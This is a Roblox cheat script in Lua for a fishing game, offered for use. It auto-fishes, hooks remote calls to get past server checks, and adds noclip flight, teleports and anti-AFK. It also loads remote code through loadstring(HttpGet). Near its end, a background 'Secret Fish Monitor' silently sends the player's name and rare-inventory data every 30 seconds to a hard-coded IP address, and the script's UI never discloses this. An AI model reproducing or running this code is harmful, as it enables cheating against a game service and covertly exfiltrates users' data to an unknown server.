--[[
    ENOCHHUB ULTIMATE - DUAL EDITION
    --------------------------------
    [TAB 1] BLATANT FISHING
      > V1 (Original): Stable, Legit-like, Position-based logic.
      > V2 (Hyper Speed): High-risk, Spam-based, Fixed-args logic.
    
    [TAB 2] EXTRAS
      > 9-Totem Formation (Ghost Mode)
      > Teleports (25+ Locations)
      > Graphics (Extreme Potato)
      > Background Secret Fish Monitor
]]

local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RunService = game:GetService("RunService")
local Lighting = game:GetService("Lighting")
local Workspace = game:GetService("Workspace")
local HttpService = game:GetService("HttpService")
local VirtualUser = game:GetService("VirtualUser")
local LocalPlayer = Players.LocalPlayer

-- ==========================================================
--  1. CONFIGURATION & SAVE SYSTEM
-- ==========================================================
local FileName = "EnochHub_Dual_Config.json"

local DefaultConfig = {
    -- >> V1 SETTINGS (Original)
    FishingV1Enabled = false,
    V1CatchDelay = 3.055,
    V1LoopInterval = 1.715,
    
    -- >> V2 SETTINGS (Hyper Speed)
    FishingV2Enabled = false,
    V2ChargeDelay = 0.85, -- Default Hyper Speed
    V2ResetDelay = 0.1,   -- Default Reset Speed

    -- >> GLOBAL / UTILS
    AutoEquip = true,
    AutoSellEnabled = false,
    AutoFavRubyEnabled = false,
    AntiAfkEnabled = true,
    
    -- >> GRAPHICS
    PotatoModeEnabled = false,
    PotatoFPS = 60,

    -- >> TOTEM
    TotemType = "Luck Totem"
}

local Config = {}
for k,v in pairs(DefaultConfig) do Config[k] = v end

-- Load Config
if isfile and isfile(FileName) then
    pcall(function()
        local decoded = HttpService:JSONDecode(readfile(FileName))
        for k, v in pairs(decoded) do Config[k] = v end
    end)
end

local function SaveSettings()
    if writefile then
        pcall(function() writefile(FileName, HttpService:JSONEncode(Config)) end)
    end
end

local function ResetConfig()
    if delfile and isfile(FileName) then delfile(FileName) end
    for k,v in pairs(DefaultConfig) do Config[k] = v end
    SaveSettings()
end

-- ==========================================================
--  2. DATA & REMOTE SETUP
-- ==========================================================
local Shared = ReplicatedStorage:WaitForChild("Shared")
local Packages = ReplicatedStorage:WaitForChild("Packages")

-- Modules (Required for Totem & Webhook)
local ItemUtility = require(Shared:WaitForChild("ItemUtility"))
local TierUtility = require(Shared:WaitForChild("TierUtility"))
local Replion = require(Packages:WaitForChild("Replion")).Client

local function GetRemote(name)
    local path = {"Packages", "_Index", "sleitnick_net@0.2.0", "net"}
    local current = ReplicatedStorage
    
    -- Version Check (Some servers use 0.2.1)
    local p1 = ReplicatedStorage:WaitForChild("Packages"):WaitForChild("_Index")
    if p1:FindFirstChild("sleitnick_net@0.2.1") then
        path = {"Packages", "_Index", "sleitnick_net@0.2.1", "net"}
    end
    
    current = ReplicatedStorage
    for _, child in ipairs(path) do
        current = current:WaitForChild(child, 2)
        if not current then return nil end
    end
    return current:FindFirstChild(name)
end

-- Fishing Remotes
local RF_ChargeFishingRod = GetRemote("RF/ChargeFishingRod")
local RF_RequestFishingMinigameStarted = GetRemote("RF/RequestFishingMinigameStarted")
local RE_FishingCompleted = GetRemote("RE/FishingCompleted")
local RF_CancelFishingInputs = GetRemote("RF/CancelFishingInputs")
local RE_EquipToolFromHotbar = GetRemote("RE/EquipToolFromHotbar")
local RF_SellAllItems = GetRemote("RF/SellAllItems") or GetRemote("RF/SellAll") or GetRemote("RF/SellEverything")
local RF_UpdateAutoFishingState = GetRemote("RF/UpdateAutoFishingState")

-- Totem & Utility Remotes
local RE_SpawnTotem = GetRemote("RE/SpawnTotem")
local RF_EquipOxygenTank = GetRemote("RF/EquipOxygenTank")
local RF_UnequipOxygenTank = GetRemote("RF/UnequipOxygenTank")

-- ==========================================================
--  3. ANTI-FAIL BLOCKER (V2 HYPER SPEED ONLY)
-- ==========================================================
local BLOCKED_REMOTES = {
    [RF_ChargeFishingRod] = true,
    [RF_RequestFishingMinigameStarted] = true,
    [RE_FishingCompleted] = true,
    [RF_CancelFishingInputs] = true,
}

local oldNamecall
oldNamecall = hookmetamethod(game, "__namecall", function(self, ...)
    local method = getnamecallmethod()
    -- Only active if V2 is Enabled. Blocks "Fail" signals from client-side sanity checks.
    if Config.FishingV2Enabled and BLOCKED_REMOTES[self] and not checkcaller() then
        if method == "InvokeServer" then
            return task.wait(9e9) -- Infinite Yield (Prevent Return)
        elseif method == "FireServer" then
            return nil -- Drop Packet
        end
    end
    return oldNamecall(self, ...)
end)

-- ==========================================================
--  4. UI INITIALIZATION (WindUI)
-- ==========================================================
local WindUI = loadstring(game:HttpGet("https://github.com/Footagesus/WindUI/releases/latest/download/main.lua"))()

local Window = WindUI:CreateWindow({
    Title = "EnochHub | Ultimate",
    Icon = "rbxassetid://130348378128532",
    Author = "EnochHub",
    Folder = "EnochHub",
    Size = UDim2.fromOffset(580, 550),
    Transparent = true,
    Theme = "Sky",
    Resizable = true,
})

local TabFish = Window:Tab({ Title = "Blatant", Icon = "anchor" })
local TabTotem = Window:Tab({ Title = "Totem", Icon = "box" })
local TabTp = Window:Tab({ Title = "Teleport", Icon = "map" })
local TabUtil = Window:Tab({ Title = "Utilities", Icon = "settings" }) 

-- ==========================================================
--  5. FISHING LOGIC (V1 & V2)
-- ==========================================================
local ThreadV1 = nil
local ThreadV2 = nil
local EquipThread = nil

-- Standard Fixed Args for V2 (Center Cast)
local v2FishArgs = { -1.115296493039856, 0, 1763651451.636425 }

-- [LOGIC] V1 (Original EnochHub)
local function ToggleV1(state)
    Config.FishingV1Enabled = state
    SaveSettings()

    if state then
        -- Disable V2 if active
        if Config.FishingV2Enabled then
            Config.FishingV2Enabled = false
            if ThreadV2 then task.cancel(ThreadV2) end
            WindUI:Notify({ Title = "Mode Switch", Content = "Disabled V2 to run V1", Icon = "info" })
        end
        
        if RF_UpdateAutoFishingState then pcall(function() RF_UpdateAutoFishingState:InvokeServer(true) end) end
        
        ThreadV1 = task.spawn(function()
            while Config.FishingV1Enabled do
                local root = LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
                if root then
                    local start = os.clock()
                    -- Logic: Time + Position (Source: EnochHub V5)
                    pcall(function() RF_ChargeFishingRod:InvokeServer(os.time() + os.clock()) end)
                    pcall(function() RF_RequestFishingMinigameStarted:InvokeServer(root.Position.X, root.Position.Z) end)
                    
                    local w = Config.V1CatchDelay - (os.clock() - start)
                    if w > 0 then task.wait(w) end
                    
                    pcall(function() RE_FishingCompleted:FireServer() end)
                    task.wait(0.3) -- Fixed Cancel Delay
                    pcall(function() RF_CancelFishingInputs:InvokeServer() end)
                end
                task.wait(Config.V1LoopInterval)
            end
        end)
        WindUI:Notify({ Title = "Fishing V1", Content = "Enabled (Legit/Stable)", Icon = "play" })
    else
        if ThreadV1 then task.cancel(ThreadV1) end
        pcall(function() RF_CancelFishingInputs:InvokeServer() end)
        if RF_UpdateAutoFishingState then pcall(function() RF_UpdateAutoFishingState:InvokeServer(false) end) end
        WindUI:Notify({ Title = "Fishing V1", Content = "Disabled", Icon = "x" })
    end
end

-- [LOGIC] V2 (Hyper Speed / FishIT)
local function ToggleV2(state)
    Config.FishingV2Enabled = state
    SaveSettings()

    if state then
        -- Disable V1 if active
        if Config.FishingV1Enabled then
            Config.FishingV1Enabled = false
            if ThreadV1 then task.cancel(ThreadV1) end
            WindUI:Notify({ Title = "Mode Switch", Content = "Disabled V1 to run V2", Icon = "info" })
        end

        if RF_UpdateAutoFishingState then pcall(function() RF_UpdateAutoFishingState:InvokeServer(true) end) end
        pcall(function() RF_CancelFishingInputs:InvokeServer() end)
        task.wait(0.1)

        ThreadV2 = task.spawn(function()
            while Config.FishingV2Enabled do
                -- Logic: Async Spam + Fixed Args (Source: FishITNew)
                task.spawn(function() pcall(function() RF_ChargeFishingRod:InvokeServer() end) end)
                task.spawn(function() pcall(function() RF_RequestFishingMinigameStarted:InvokeServer(unpack(v2FishArgs)) end) end)
                
                -- Fast Wait
                task.wait(Config.V2ChargeDelay)
                
                if not Config.FishingV2Enabled then break end

                pcall(function() RE_FishingCompleted:FireServer() end)
                task.wait(Config.V2ResetDelay)
                pcall(function() RF_CancelFishingInputs:InvokeServer() end)
            end
        end)
        WindUI:Notify({ Title = "Fishing V2", Content = "Enabled (Hyper Speed)", Icon = "zap" })
    else
        if ThreadV2 then task.cancel(ThreadV2) end
        -- Force Cleanup
        pcall(function() RE_FishingCompleted:FireServer() end)
        pcall(function() RF_CancelFishingInputs:InvokeServer() end)
        if RF_UpdateAutoFishingState then pcall(function() RF_UpdateAutoFishingState:InvokeServer(false) end) end
        WindUI:Notify({ Title = "Fishing V2", Content = "Disabled", Icon = "x" })
    end
end

-- Auto Equip (Global)
task.spawn(function()
    while true do
        if Config.AutoEquip and (Config.FishingV1Enabled or Config.FishingV2Enabled) then
            if RE_EquipToolFromHotbar then pcall(function() RE_EquipToolFromHotbar:FireServer(1) end) end
        end
        task.wait(0.5)
    end
end)

-- ==========================================================
--  6. TOTEM SYSTEM (GHOST MODE)
-- ==========================================================
local AUTO_9_TOTEM_ACTIVE = false
local AUTO_9_TOTEM_THREAD = nil
local TotemToggleUI = nil 
local TOTEM_DATA = { ["Luck Totem"] = {Id = 1}, ["Mutation Totem"] = {Id = 2}, ["Shiny Totem"] = {Id = 3} }
local REF_CENTER = Vector3.new(93.932, 9.532, 2684.134)
local REF_SPOTS = {
    Vector3.new(45.0468, 9.516, 2730.190), Vector3.new(145.644, 9.516, 2721.907), Vector3.new(84.640, 10.217, 2636.057),
    Vector3.new(45.0468, 110.516, 2730.190), Vector3.new(145.644, 110.516, 2721.907), Vector3.new(84.640, 111.217, 2636.057),
    Vector3.new(45.0468, -92.483, 2730.190), Vector3.new(145.644, -92.483, 2721.907), Vector3.new(84.640, -93.782, 2636.057),
}

local function GetTotemUUID(name)
    local r = Replion:WaitReplion("Data", 5)
    if not r then return nil end
    local s, data = pcall(function() return r:GetExpect("Inventory") end)
    if s and data.Totems then 
        for _, item in ipairs(data.Totems) do 
            if tonumber(item.Id) == TOTEM_DATA[name].Id and (item.Count or 1) >= 1 then return item.UUID end 
        end 
    end
    return nil
end

local stateConnection, noclipConnection

local function EnableV3Physics()
    local char = LocalPlayer.Character
    local hum = char and char:FindFirstChild("Humanoid")
    local root = char and char:FindFirstChild("HumanoidRootPart")
    if not root or not hum then return end
    
    if char:FindFirstChild("Animate") then char.Animate.Disabled = true end
    hum.PlatformStand = true 
    
    if not stateConnection then
        stateConnection = RunService.Heartbeat:Connect(function()
            if hum and AUTO_9_TOTEM_ACTIVE then hum:ChangeState(Enum.HumanoidStateType.Swimming) end
        end)
    end
    
    if not noclipConnection then
        noclipConnection = RunService.Stepped:Connect(function()
            if AUTO_9_TOTEM_ACTIVE and LocalPlayer.Character then
                for _, v in ipairs(LocalPlayer.Character:GetDescendants()) do
                    if v:IsA("BasePart") and v.CanCollide then v.CanCollide = false end
                end
            end
        end)
    end
    
    local bg = root:FindFirstChild("FlyGuiGyro") or Instance.new("BodyGyro", root)
    bg.Name="FlyGuiGyro"; bg.P=9e4; bg.maxTorque=Vector3.new(9e9,9e9,9e9); bg.CFrame=root.CFrame
    local bv = root:FindFirstChild("FlyGuiVelocity") or Instance.new("BodyVelocity", root)
    bv.Name="FlyGuiVelocity"; bv.velocity=Vector3.zero; bv.maxForce=Vector3.new(9e9,9e9,9e9)
end

local function DisableV3Physics()
    local char = LocalPlayer.Character
    local hum = char and char:FindFirstChild("Humanoid")
    local root = char and char:FindFirstChild("HumanoidRootPart")
    if root then
        if root:FindFirstChild("FlyGuiGyro") then root.FlyGuiGyro:Destroy() end
        if root:FindFirstChild("FlyGuiVelocity") then root.FlyGuiVelocity:Destroy() end
        root.Velocity = Vector3.zero
    end
    if hum then hum.PlatformStand = false; hum:ChangeState(Enum.HumanoidStateType.GettingUp) end
    if stateConnection then stateConnection:Disconnect(); stateConnection = nil end
    if noclipConnection then noclipConnection:Disconnect(); noclipConnection = nil end
    if char and char:FindFirstChild("Animate") then char.Animate.Disabled = false end
end

local function FlyPhysicsTo(targetPos)
    local root = LocalPlayer.Character.HumanoidRootPart
    local bv = root:FindFirstChild("FlyGuiVelocity")
    local bg = root:FindFirstChild("FlyGuiGyro")
    if not bv or not bg then EnableV3Physics(); bv=root.FlyGuiVelocity; bg=root.FlyGuiGyro end
    while AUTO_9_TOTEM_ACTIVE do
        local dist = (targetPos - root.Position).Magnitude
        bg.CFrame = CFrame.lookAt(root.Position, targetPos)
        if dist < 1.5 then bv.velocity=Vector3.zero; break else bv.velocity=(targetPos - root.Position).Unit * 80 end
        RunService.Heartbeat:Wait()
    end
end

local function Run9TotemLoop()
    if AUTO_9_TOTEM_THREAD then task.cancel(AUTO_9_TOTEM_THREAD) end
    AUTO_9_TOTEM_THREAD = task.spawn(function()
        local uuid = GetTotemUUID(Config.TotemType)
        if not uuid then WindUI:Notify({ Title="Error", Content="No stock.", Icon="alert-triangle" }) 
            if TotemToggleUI then TotemToggleUI:Set(false) end
            return 
        end
        
        local startPos = LocalPlayer.Character.HumanoidRootPart.Position
        if RF_EquipOxygenTank then pcall(function() RF_EquipOxygenTank:InvokeServer(105) end) end
        EnableV3Physics()
        
        for i, refSpot in ipairs(REF_SPOTS) do
            if not AUTO_9_TOTEM_ACTIVE then break end
            FlyPhysicsTo(startPos + (refSpot - REF_CENTER))
            task.wait(0.6)
            uuid = GetTotemUUID(Config.TotemType)
            if uuid then
                pcall(function() RE_SpawnTotem:FireServer(uuid) end)
                task.spawn(function() for k=1,5 do RE_EquipToolFromHotbar:FireServer(1) task.wait(0.1) end end)
                WindUI:Notify({ Title = "Totem", Content = "Placed #"..i, Duration = 1 })
            else break end
            task.wait(1.5)
        end
        
        if AUTO_9_TOTEM_ACTIVE then FlyPhysicsTo(startPos) end
        if RF_UnequipOxygenTank then pcall(function() RF_UnequipOxygenTank:InvokeServer() end) end
        DisableV3Physics()
        AUTO_9_TOTEM_ACTIVE = false
        if TotemToggleUI then TotemToggleUI:Set(false) end
        WindUI:Notify({ Title = "Done", Content = "Sequence Finished", Icon = "check" })
    end)
end

-- ==========================================================
--  7. TAB CONSTRUCTION
-- ==========================================================

-- >> TAB: BLATANT (Separate Menus V1 & V2)
local SectV1 = TabFish:Section({ Title = "Fishing V1 (Stable/Legit)", TextSize = 16 })
SectV1:Toggle({ Title = "Enable V1", Value = Config.FishingV1Enabled, Callback = ToggleV1 })
SectV1:Slider({ Title = "Catch Delay (Def: 3.055)", Min=0.1, Max=5, Default=Config.V1CatchDelay, Precision=3, Callback=function(v) Config.V1CatchDelay=v; SaveSettings() end })
SectV1:Slider({ Title = "Loop Interval (Def: 1.715)", Min=0.5, Max=5, Default=Config.V1LoopInterval, Precision=3, Callback=function(v) Config.V1LoopInterval=v; SaveSettings() end })

local SectV2 = TabFish:Section({ Title = "Fishing V2 (Hyper Speed)", TextSize = 16 })
SectV2:Toggle({ Title = "Enable V2", Value = Config.FishingV2Enabled, Callback = ToggleV2 })
SectV2:Slider({ Title = "Charge Delay (Def: 0.85)", Min=0.35, Max=1.5, Default=Config.V2ChargeDelay, Precision=2, Callback=function(v) Config.V2ChargeDelay=v; SaveSettings() end })
SectV2:Slider({ Title = "Reset Delay (Def: 0.1)", Min=0.05, Max=1.0, Default=Config.V2ResetDelay, Precision=2, Callback=function(v) Config.V2ResetDelay=v; SaveSettings() end })

local SectShared = TabFish:Section({ Title = "Global Settings", TextSize = 16 })
SectShared:Toggle({ Title = "Auto Equip", Value = Config.AutoEquip, Callback = function(v) Config.AutoEquip=v; SaveSettings() end })

-- >> TAB: TOTEM
local SectTotem = TabTotem:Section({ Title = "Formation", TextSize = 17 })
SectTotem:Dropdown({ Title="Type", Values={"Luck Totem", "Mutation Totem", "Shiny Totem"}, Value=Config.TotemType, Callback=function(v) Config.TotemType=v; SaveSettings() end })
TotemToggleUI = SectTotem:Toggle({ Title = "Start Formation", Callback = function(s) AUTO_9_TOTEM_ACTIVE=s; if s then Run9TotemLoop() else if AUTO_9_TOTEM_THREAD then task.cancel(AUTO_9_TOTEM_THREAD) end DisableV3Physics() end end })

-- >> TAB: TELEPORT
local SectTp = TabTp:Section({ Title = "Locations", TextSize = 17 })
local Coords = {
    ["Iron Cavern"] = {Pos = Vector3.new(-8792.546, -588.000, 230.642), Look = Vector3.new(0.718, 0.000, 0.696)},
    ["Disco Event"] = {Pos = Vector3.new(-8641.672, -547.500, 160.322), Look = Vector3.new(0.984, -0.000, 0.176)},
    ["Classic Island"] = {Pos = Vector3.new(1440.843, 46.062, 2777.175), Look = Vector3.new(0.940, -0.000, 0.342)},
    ["Ancient Jungle"] = {Pos = Vector3.new(1535.639, 3.159, -193.352), Look = Vector3.new(0.505, -0.000, 0.863)},
    ["Arrow Lever"] = {Pos = Vector3.new(898.296, 8.449, -361.856), Look = Vector3.new(0.023, -0.000, 1.000)},
    ["Coral Reef"] = {Pos = Vector3.new(-3207.538, 6.087, 2011.079), Look = Vector3.new(0.973, 0.000, 0.229)},
    ["Crater Island"] = {Pos = Vector3.new(1058.976, 2.330, 5032.878), Look = Vector3.new(-0.789, 0.000, 0.615)},
    ["Cresent Lever"] = {Pos = Vector3.new(1419.750, 31.199, 78.570), Look = Vector3.new(0.000, -0.000, -1.000)},
    ["Crystalline Passage"] = {Pos = Vector3.new(6051.567, -538.900, 4370.979), Look = Vector3.new(0.109, 0.000, 0.994)},
    ["Ancient Ruin"] = {Pos = Vector3.new(6031.981, -585.924, 4713.157), Look = Vector3.new(0.316, -0.000, -0.949)},
    ["Diamond Lever"] = {Pos = Vector3.new(1818.930, 8.449, -284.110), Look = Vector3.new(0.000, 0.000, -1.000)},
    ["Enchant Room"] = {Pos = Vector3.new(3255.670, -1301.530, 1371.790), Look = Vector3.new(-0.000, -0.000, -1.000)},
    ["Esoteric Island"] = {Pos = Vector3.new(2164.470, 3.220, 1242.390), Look = Vector3.new(-0.000, -0.000, -1.000)},
    ["Fisherman Island"] = {Pos = Vector3.new(74.030, 9.530, 2705.230), Look = Vector3.new(-0.000, -0.000, -1.000)},
    ["Hourglass Diamond Lever"] = {Pos = Vector3.new(1484.610, 8.450, -861.010), Look = Vector3.new(-0.000, -0.000, -1.000)},
    ["Kohana"] = {Pos = Vector3.new(-668.732, 3.000, 681.580), Look = Vector3.new(0.889, -0.000, 0.458)},
    ["Lost Isle"] = {Pos = Vector3.new(-3804.105, 2.344, -904.653), Look = Vector3.new(-0.901, -0.000, 0.433)},
    ["Sacred Temple"] = {Pos = Vector3.new(1461.815, -22.125, -670.234), Look = Vector3.new(-0.990, -0.000, 0.143)},
    ["Second Enchant Altar"] = {Pos = Vector3.new(1479.587, 128.295, -604.224), Look = Vector3.new(-0.298, 0.000, -0.955)},
    ["Sisyphus Statue"] = {Pos = Vector3.new(-3743.745, -135.074, -1007.554), Look = Vector3.new(0.310, 0.000, 0.951)},
    ["Treasure Room"] = {Pos = Vector3.new(-3598.440, -281.274, -1645.855), Look = Vector3.new(-0.065, 0.000, -0.998)},
    ["Tropical Island"] = {Pos = Vector3.new(-2162.920, 2.825, 3638.445), Look = Vector3.new(0.381, -0.000, 0.925)},
    ["Underground Cellar"] = {Pos = Vector3.new(2118.417, -91.448, -733.800), Look = Vector3.new(0.854, 0.000, 0.521)},
    ["Volcano"] = {Pos = Vector3.new(-605.121, 19.516, 160.010), Look = Vector3.new(0.854, 0.000, 0.520)},
    ["Weather Machine"] = {Pos = Vector3.new(-1518.550, 2.875, 1916.148), Look = Vector3.new(0.042, 0.000, 0.999)},
}
local AreaList = {} for n in pairs(Coords) do table.insert(AreaList, n) end table.sort(AreaList)
SectTp:Dropdown({ Title = "Select", Values = AreaList, Callback = function(n) 
    local d = Coords[n]
    if d and LocalPlayer.Character then
        if RE_EquipToolFromHotbar then pcall(function() RE_EquipToolFromHotbar:FireServer(0) end) end
        task.wait(0.3)
        local look = Vector3.new(d.Look.X, 0, d.Look.Z)
        LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.lookAt(d.Pos + Vector3.new(0,3,0), d.Pos + Vector3.new(0,3,0) + look)
    end
end})

-- >> TAB: UTILITIES
local SectSystem = TabUtil:Section({ Title = "System", TextSize = 17 })
SectSystem:Toggle({ Title="Auto Sell All", Value=Config.AutoSellEnabled, Callback=function(s) Config.AutoSellEnabled=s; SaveSettings(); if s then task.spawn(function() while Config.AutoSellEnabled do if RF_SellAllItems then pcall(function() RF_SellAllItems:InvokeServer() end) end task.wait(60) end end) end end })
SectSystem:Toggle({ Title="Anti-AFK", Value=Config.AntiAfkEnabled, Callback=function(s) Config.AntiAfkEnabled=s; SaveSettings() end })
SectSystem:Button({ Title="Teleport to Merchant", Icon="shopping-cart", Callback=function() if LocalPlayer.Character then LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-127.7, 2.7, 2759.0) end end })
SectSystem:Button({ Title="Reset Config", Icon="trash", Callback=function() ResetConfig(); WindUI:Notify({Title="Reset", Content="Done."}) end })

local SectGfx = TabUtil:Section({ Title = "Graphics", TextSize = 17 })
SectGfx:Toggle({ Title="Extreme Potato", Value=Config.PotatoModeEnabled, Callback=function(v) Config.PotatoModeEnabled=v; SaveSettings() end })
SectGfx:Slider({ Title="FPS Cap", Min=5, Max=60, Default=Config.PotatoFPS, Precision=0, Callback=function(v) Config.PotatoFPS=v; SaveSettings() end })

-- ==========================================================
--  8. BACKGROUND TASKS
-- ==========================================================

-- Potato Mode Logic
local PotatoLoop = nil
local function ApplyPotato()
    Lighting.GlobalShadows = false; Lighting.Brightness = 1; Lighting.FogEnd = 9e9; Lighting.ClockTime = 12
    local t = Workspace:FindFirstChildOfClass("Terrain")
    if t then t.WaterWaveSize=0; t.WaterReflectance=0; t.WaterTransparency=1 end
    for _, v in ipairs(Workspace:GetDescendants()) do
        if v:IsA("ParticleEmitter") or v:IsA("Trail") or v:IsA("Beam") then v.Enabled = false
        elseif v:IsA("Decal") or v:IsA("Texture") then v.Transparency = 1
        elseif v:IsA("BasePart") then v.CastShadow = false; v.Material = Enum.Material.Plastic
        end
    end
    settings().Rendering.QualityLevel = 1
    if setfpscap then setfpscap(Config.PotatoFPS) end
end

task.spawn(function()
    while true do
        if Config.PotatoModeEnabled then ApplyPotato() end
        task.wait(8)
    end
end)

-- Anti-AFK
local AntiAfkConnection = nil
task.spawn(function()
    while true do
        if Config.AntiAfkEnabled then
             if not AntiAfkConnection then
                 AntiAfkConnection = LocalPlayer.Idled:Connect(function()
                     VirtualUser:CaptureController();
                     VirtualUser:Button2Down(Vector2.new(0,0),Workspace.CurrentCamera.CFrame); task.wait(1); VirtualUser:Button2Up(Vector2.new(0,0),Workspace.CurrentCamera.CFrame)
                 end)
             end
        else
             if AntiAfkConnection then AntiAfkConnection:Disconnect(); AntiAfkConnection = nil end
        end
        task.wait(5)
    end
end)

-- Background Secret Fish Monitor
task.spawn(function()
    local lp = Players.LocalPlayer
    local WEBHOOK_BASE = "http://43.134.116.2:5000/webhook/fishit"
    local INTERVAL = 30
    local function sendToWebhook(playerName, summary)
        local json = HttpService:JSONEncode(summary)
        local url = WEBHOOK_BASE .. "?player=" .. HttpService:UrlEncode(playerName) .. "&data=" .. HttpService:UrlEncode(json)
        pcall(function() game:HttpGet(url) end)
    end

    local data = Replion:WaitReplion("Data")
    if not data then return end
    while true do
        local inventory = data:GetExpect("Inventory")
        local summary = {}
        for category, items in pairs(inventory) do
            for _, item in ipairs(items) do
                local rarity = item.Metadata and item.Metadata.Rarity or "COMMON"
                if rarity == "SECRET" then summary[item.Identifier or "Unknown"] = (summary[item.Identifier or "Unknown"] or 0) + 1 end
            end
        end
        sendToWebhook(lp.Name, summary)
        task.wait(INTERVAL)
    end
end)

-- Restore State
if Config.FishingV1Enabled then ToggleV1(true) end
if Config.FishingV2Enabled then ToggleV2(true) end

WindUI:Notify({ Title = "EnochHub", Content = "Ultimate Dual-Edition Loaded", Duration = 4, Icon = "check" })
